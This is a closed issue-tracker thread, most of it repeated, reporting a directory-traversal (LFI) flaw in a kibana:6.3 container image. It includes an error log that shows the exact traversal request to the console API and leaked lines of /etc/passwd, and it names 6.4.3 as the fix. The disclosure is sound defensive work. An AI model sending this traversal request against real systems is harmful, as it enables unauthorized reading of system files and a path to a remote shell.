Closed kimattree closed 4 years ago
Category:
Container images
Type:
Bug
The current version of google/elastic-gke-logging/kibana:6.3 has an LFI vulnerability allowing directory traversal attacks on underlying infrastructure, this can also lead to remote shell exploitation as described here: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
Using the current kibana image, I was able to replicate the LFI traversal attack against /etc/passwd in the pod:
{"type":"error","@timestamp":"2020-05-25T06:22:01Z","tags":[],"pid":1,"level":"error","error":{"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)","name":"SyntaxError","stack":"SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)\n> 1 | root:x:0:0:root:/root:/bin/bash\n | ^\n 2 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n 3 | bin:x:2:2:bin:/bin:/usr/sbin/nologin\n 4 | sys:x:3:3:sys:/dev:/usr/sbin/nologin\n at Parser.pp$5.raise (/usr/share/kibana/node_modules/babylon/lib/index.js:4454:13)\n at Parser.pp.unexpected (/usr/share/kibana/node_modules/babylon/lib/index.js:1761:8)\n at Parser.pp.semicolon (/usr/share/kibana/node_modules/babylon/lib/index.js:1742:38)\n at Parser.pp$1.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2236:8)\n at Parser.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5934:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1911:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseBlockBody (/usr/share/kibana/node_modules/babylon/lib/index.js:2268:21)\n at Parser.pp$1.parseTopLevel (/usr/share/kibana/node_modules/babylon/lib/index.js:1778:8)\n at Parser.parse (/usr/share/kibana/node_modules/babylon/lib/index.js:1673:17)"},"url":{"protocol":null,"slashes":null,"auth":null,"host":null,"port":null,"hostname":null,"hash":null,"search":"?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","query":{"sense_version":"@@SENSE_VERSION","apis":"../../../../../../../../etc/passwd"},"pathname":"/api/console/api_server","path":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","href":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd"},"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)"} Debug: internal, implementation, error SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)
1 | root:x:0:0:root:/root:/bin/bash | ^ 2 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 3 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 4 | sys:x:3:3:sys:/dev:/usr/sbin/nologin
the fix for this is in Elastic and Kibana versions 6.4.3.
Hello!
Thank you for interest in our solution and for this vulnerability report. Our solution will be updated soon.
Category:
Container images
Type:
Bug
The current version of google/elastic-gke-logging/kibana:6.3 has an LFI vulnerability allowing directory traversal attacks on underlying infrastructure, this can also lead to remote shell exploitation as described here: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
Using the current kibana image, I was able to replicate the LFI traversal attack against /etc/passwd in the pod:
{"type":"error","@timestamp":"2020-05-25T06:22:01Z","tags":[],"pid":1,"level":"error","error":{"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)","name":"SyntaxError","stack":"SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)\n> 1 | root:x:0:0:root:/root:/bin/bash\n | ^\n 2 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n 3 | bin:x:2:2:bin:/bin:/usr/sbin/nologin\n 4 | sys:x:3:3:sys:/dev:/usr/sbin/nologin\n at Parser.pp$5.raise (/usr/share/kibana/node_modules/babylon/lib/index.js:4454:13)\n at Parser.pp.unexpected (/usr/share/kibana/node_modules/babylon/lib/index.js:1761:8)\n at Parser.pp.semicolon (/usr/share/kibana/node_modules/babylon/lib/index.js:1742:38)\n at Parser.pp$1.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2236:8)\n at Parser.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5934:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1911:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseBlockBody (/usr/share/kibana/node_modules/babylon/lib/index.js:2268:21)\n at Parser.pp$1.parseTopLevel (/usr/share/kibana/node_modules/babylon/lib/index.js:1778:8)\n at Parser.parse (/usr/share/kibana/node_modules/babylon/lib/index.js:1673:17)"},"url":{"protocol":null,"slashes":null,"auth":null,"host":null,"port":null,"hostname":null,"hash":null,"search":"?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","query":{"sense_version":"@@SENSE_VERSION","apis":"../../../../../../../../etc/passwd"},"pathname":"/api/console/api_server","path":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","href":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd"},"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)"} Debug: internal, implementation, error SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)
the fix for this is in Elastic and Kibana versions 6.4.3.